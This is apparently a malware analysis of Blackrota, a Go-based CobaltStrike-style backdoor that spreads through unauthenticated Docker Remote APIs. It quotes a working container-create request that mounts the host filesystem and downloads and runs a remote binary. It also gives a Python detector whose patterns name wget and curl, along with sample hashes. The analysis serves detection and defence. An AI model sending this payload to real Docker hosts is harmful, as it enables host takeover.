Blackrota is a backdoor written in Go that targets Docker containers. It spreads by exploiting unauthorized access to the Docker Remote API, i.e. a Docker daemon exposed on the network without authentication. The malware is currently only available for Linux, as an ELF file, and supports both the x86 and x86-64 CPU architectures. Blackrota is configured and compiled from geacon, a CobaltStrike Beacon implemented in Go, so it acts as a CobaltStrike Beacon that communicates with CobaltStrike to control compromised hosts. It implements only a subset of the Beacon commands: CMD_SHELL (execute a shell command), CMD_UPLOAD (upload files), CMD_DOWNLOAD (download the specified file), CMD_FILE_BROWSE (file browsing), CMD_CD (change directory), CMD_SLEEP (set the sleep delay), CMD_PWD (return the current directory) and CMD_EXIT (exit).
Blackrota Infection
The author of Blackrota uses multiple payloads that abuse unauthorized access to the Docker Remote API. A typical payload, simplified, looks as follows:
POST /v1.37/containers/create HTTP/1.1
Host: {target_host}:{target_port}
User-Agent: Docker-Client/19.03.7 (linux)
Content-Length: 1687
Content-Type: application/json
{"Env":[],"Cmd":["/bin/sh","-c","rm ./64 ; wget https://semantipublic.s3.[.]com/itau-poc-elastic/64;chmod 777 64; nohup ./64 \u003c/dev/null \u003e/dev/null 2\u003e\u00261 \u0026"],"Image":"alpine","Volumes":{},"WorkingDir":"","HostConfig":{"Binds":["/:/mnt"]}}
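The request above asks the exposed daemon to create an alpine container with the host's root filesystem bind-mounted at /mnt, then runs a shell that fetches the 64 binary and starts it detached (the \u003c, \u003e and \u0026 sequences are the JSON escapes Docker's Go client emits for <, > and &). The following is an added example, not code from the page or from the Blackrota/geacon authors: a small Python checker that parses a /containers/create body, as it would be captured by a proxy or the daemon's request log, and flags the two traits this payload relies on, a sensitive host path in HostConfig.Binds and a download-and-execute Cmd. The sample bodies are constructed; the malicious one is the page's own payload (with the defanged URL kept as-is), the benign one is a hypothetical nginx container. The list of sensitive host paths and the regular expressions are my choices, not anything the page defines.

```python
import json
import re

# Host directories that hand over the host when bind-mounted into a container.
# "/" is what the page's payload binds; the others are my additions (assumption).
SENSITIVE_HOST_DIRS = ("/etc", "/root", "/proc", "/sys", "/var/run/docker.sock")

# Second-stage fetch tools and the execution idioms that usually follow them.
DOWNLOADERS = re.compile(r"\b(wget|curl|tftp)\b")
EXEC_MARKERS = re.compile(r"\bchmod\s+[+0-7]*[x7]|\bnohup\b|(^|[;&|]\s*)\./\S+")


def _host_side(bind):
    """Docker bind syntax is host_path:container_path[:opts]; keep the host side."""
    host_path = bind.split(":", 1)[0]
    return host_path.rstrip("/") or "/"


def analyze_create_request(body):
    """Return a list of findings for one /containers/create JSON body (empty = nothing suspicious)."""
    findings = []
    try:
        req = json.loads(body)
    except json.JSONDecodeError as exc:
        return [f"malformed JSON: {exc}"]

    host_cfg = req.get("HostConfig") or {}
    for bind in host_cfg.get("Binds") or []:
        root = _host_side(bind)
        if root == "/" or any(root == d or root.startswith(d + "/") for d in SENSITIVE_HOST_DIRS):
            findings.append(f"bind mounts sensitive host path: {bind}")
    if host_cfg.get("Privileged"):
        findings.append("container requested --privileged")
    if host_cfg.get("PidMode") == "host" or host_cfg.get("NetworkMode") == "host":
        findings.append("container shares host PID or network namespace")

    # Cmd is a JSON array; json.loads has already turned \u003c etc. back into < > &,
    # so the redirections and the trailing & are visible to the regexes.
    cmd = " ".join(str(part) for part in req.get("Cmd") or [])
    if DOWNLOADERS.search(cmd) and EXEC_MARKERS.search(cmd):
        findings.append("Cmd downloads and executes a payload")
    return findings


# Constructed sample: the page's payload body, escapes as Docker's client sends them.
MALICIOUS_BODY = (
    '{"Env":[],"Cmd":["/bin/sh","-c","rm ./64 ; wget https://semantipublic.s3.[.]com/itau-poc-elastic/64;'
    'chmod 777 64; nohup ./64 \\u003c/dev/null \\u003e/dev/null 2\\u003e\\u00261 \\u0026"],'
    '"Image":"alpine","Volumes":{},"WorkingDir":"","HostConfig":{"Binds":["/:/mnt"]}}'
)

# Constructed sample: a hypothetical ordinary web container with a read-only content mount.
BENIGN_BODY = (
    '{"Cmd":["nginx","-g","daemon off;"],"Image":"nginx",'
    '"HostConfig":{"Binds":["/srv/www:/usr/share/nginx/html:ro"]}}'
)

if __name__ == "__main__":
    for label, body in (("malicious", MALICIOUS_BODY), ("benign", BENIGN_BODY)):
        print(label, analyze_create_request(body) or ["no findings"])
```

The checker deliberately inspects the decoded JSON rather than the raw bytes, because a signature written against the literal string "nohup ./64 <" would miss the escaped form the real client sends. The precondition for this whole infection chain is a daemon reachable over plain TCP (by convention port 2375) that answers API calls without TLS client authentication; a daemon that serves GET /version to an unauthenticated client is exposed in exactly the way the payload above expects.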
Blackrota Linux Malware Signatures
MD5: 6e020db51665614f4a2fd84fb0f83778
SHA256: a6fdc85b5406097edf795f6a9dcea8ecb85095cfc17cc970a5d80764b052c363
Blackrota Linux Malware Download